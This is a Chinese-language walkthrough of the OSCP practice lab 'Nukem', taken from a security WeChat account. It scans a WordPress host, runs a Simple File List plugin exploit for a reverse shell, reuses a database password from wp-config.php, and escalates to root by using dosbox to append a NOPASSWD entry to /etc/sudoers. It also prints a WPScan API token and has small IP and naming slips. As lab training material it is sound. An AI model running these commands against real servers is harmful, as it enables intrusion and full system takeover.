OSCP官方靶场 Nukem WP
关注泷羽Sec和泷羽Sec-静安公众号,这里会定期更新与 OSCP、渗透测试等相关的最新文章,帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具
官网打开靶场
信息收集
# Kali攻击机地址
192.168.45.159
# 靶机地址
192.168.206.105扫描端口和目录
# 设置MTU
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# 扫描端口
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.236.105 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# 扫描服务
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
# 扫描目录
gobuster dir -e -u http://192.168.206.105 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.236.105/扫描结果如下:
┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ echo $ports
22,80,3306
┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.236.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:28 EDT
Nmap scan report for 192.168.236.105
Host is up (0.32s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:6a:f5:d3:30:08:7a:ec:38:28:a0:88:4d:75:da:19 (RSA)
| 256 43:3b:b5:bf:93:86:68:e9:d5:75:9c:7d:26:94:55:81 (ECDSA)
|_ 256 e3:f7:1c:ae:cd:91:c1:28:a3:3a:5b:f6:3e:da:3f:58 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.10
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X (97%), MikroTik RouterOS 7.X (89%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (89%)
No exact OS matches for host (test conditions non-ideal).
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.79 seconds
┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.236.105
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-20 02:36 EDT
Nmap scan report for 192.168.236.105
Host is up (0.41s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.'
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.236.105
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.236.105:80/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/author/admin/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/author/admin/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/student-registration/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/student-registration/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/sample-page/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/sample-page/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/2020/09/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/2020/09/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/instructor-registration/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/instructor-registration/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/category/uncategorized/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/index.php/category/uncategorized/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/wp-login.php
| Form id: loginform
| Form action: /wp-login.php
|
| Path: http://192.168.236.105:80/index.php/dashboard/
| Form id:
| Form action: /
|
| Path: http://192.168.236.105:80/?p=6
| Form id:
|_ Form action: /
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.'
| http-sql-injection:
| Possible sqli for queries:
|_ http://192.168.236.105:80/wp-includes/js/plupload/moxie.min.js?ver=1.3.5%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.'
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 556.05 seconds
┌──(kali㉿kali)-[~/Desktop/Nukem]
└─$ whatweb http://192.168.236.105/
http://192.168.236.105/ [200 OK] Apache[2.4.46], Country[RESERVED][ZZ], Email[admin@local.host], HTML5, HTTPServer[Unix][Apache/2.4.46 (Unix) PHP/7.4.10], IP[192.168.236.105], JQuery, MetaGenerator[TutorLMS 1.5.3,WordPress 5.5.1], PHP[7.4.10], Script[text/javascript], Title[Retro Gamming – Just another WordPress site], UncommonHeaders[link], WordPress[5.5.1], X-Powered-By[PHP/7.4.10]
===============================================================
http://192.168.206.105/index.php (Status: 301) [Size: 0] [--> http://192.168.206.105/]
http://192.168.206.105/wp-content (Status: 301) [Size: 242] [--> http://192.168.206.105/wp-content/]
http://192.168.206.105/wp-login.php (Status: 200) [Size: 6193]
http://192.168.206.105/wordpress (Status: 301) [Size: 241] [--> http://192.168.206.105/wordpress/]
http://192.168.206.105/license.txt (Status: 200) [Size: 19915]
http://192.168.206.105/wp-includes (Status: 301) [Size: 243] [--> http://192.168.206.105/wp-includes/]
http://192.168.206.105/readme.html (Status: 200) [Size: 7278]
http://192.168.206.105/wp-trackback.php (Status: 200) [Size: 135]
http://192.168.206.105/wp-admin (Status: 301) [Size: 240] [--> http://192.168.206.105/wp-admin/]
http://192.168.206.105/xmlrpc.php (Status: 405) [Size: 42]
^C
熟悉的Wordpress,找到登录入口
# 简单版本
wpscan --update --url http://192.168.206.105 -e u
# 复杂全插件扫描版本
# 枚举插件和用户名
wpscan --enumerate ap,t,u --api-token 6Chbzkayn13XcMOgzoDGA85OLpV5BbXhGQ55s8qz88g --plugins-detection aggressive --url http://192.168.206.105
# 爆破密码 很慢,作为最后的手段
wpscan --usernames admin --passwords /usr/share/wordlists/rockyou.txt --url http://192.168.206.105
WP插件漏洞
虽然没有得到登录密码,但是扫描发现simple file list插件存在漏洞,搜索simple file list插件相关漏洞利用方法。
searchsploit simple file list
searchsploit -m php/webapps/48979.py
修改为kali的IP,端口改为原靶机就开放的端口,这里用的5000,虽然在一开始并未扫描出来,但是降速后是可以扫描出来的5000端口。
rlwrap nc -lvnp 5000
python 48979.py http://192.168.206.105
内网信息收集
查看配置文件得到数据库密码
cat wp-config.php
[!success] 数据库密码 commander CommanderKeenVorticons1990
把数据密码当作用户密码来直接复用,切换用户,也可以直接ssh登录代替当前的登录。
su commander
python3 -c 'import pty;pty.spawn("/bin/bash")'拿到第一个flag
数据库中找不到更多的有用内容
scp linpeas.sh commander@192.168.206.105:/tmp/linpeas.sh上传小豌豆来找
发现/usr/bin/dosbox 可以提权,上网站查找提权命令 https://gtfobins.github.io/gtfobins/dosbox/
发现可以越权写入文件,把commander写成全sudo的即可。
LFILE='/etc/sudoers'
/usr/bin/dosbox -c 'mount c /' -c "echo commander ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit
sudo -s拿到第二个flag。
总结
入侵路径示意图
flowchart TD
%% 资产列表
A[Kali攻击机 <br> 192.168.45.159]
B[靶机 <br> 192.168.206.105]
C[http用户Shell]
D[commonder用户账户密码]
E[root]
%% 路径关系
A-->|扫描|B
B-->|插件漏洞|C
C-->|数据库密码泄露|D
D-->|busybox提权漏洞|E
%% 线型:---(实线)、-.->(虚线)、==>(粗箭头)
%% -->|是|:带条件文本的连接
%% 矩形节点[ ],菱形决策节点{ },圆弧方节点()
%% 样式定义
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% 线型与颜色方案(亮色/暗色通用)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% 应用样式
class A attack;
class B,C public;
class D,E internal;
入侵时间表
gantt
title 攻击时间表
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section 侦察阶段
目标扫描 :a1, 2025-08-20 14:25, 2025-08-20 15:25
漏洞识别 :a2, after a1, 2025-08-20 16:40
section 攻击阶段
初始访问 :b1, after a2, 2025-08-20 17:12
权限提升 :crit,b2, 2025-08-22 15:05, 15m
section 后渗透阶段
数据窃取 :c1, after b2, 5m
🔔 想要获取更多网络安全与编程技术干货?
关注 泷羽Sec-静安 公众号,与你一起探索前沿技术,分享实用的学习资源与工具。我们专注于深入分析,拒绝浮躁,只做最实用的技术分享!💻
马上加入我们,共同成长!🌟
👉 长按或扫描二维码关注公众号
直接回复文章中的关键词,获取更多技术资料与书单推荐!📚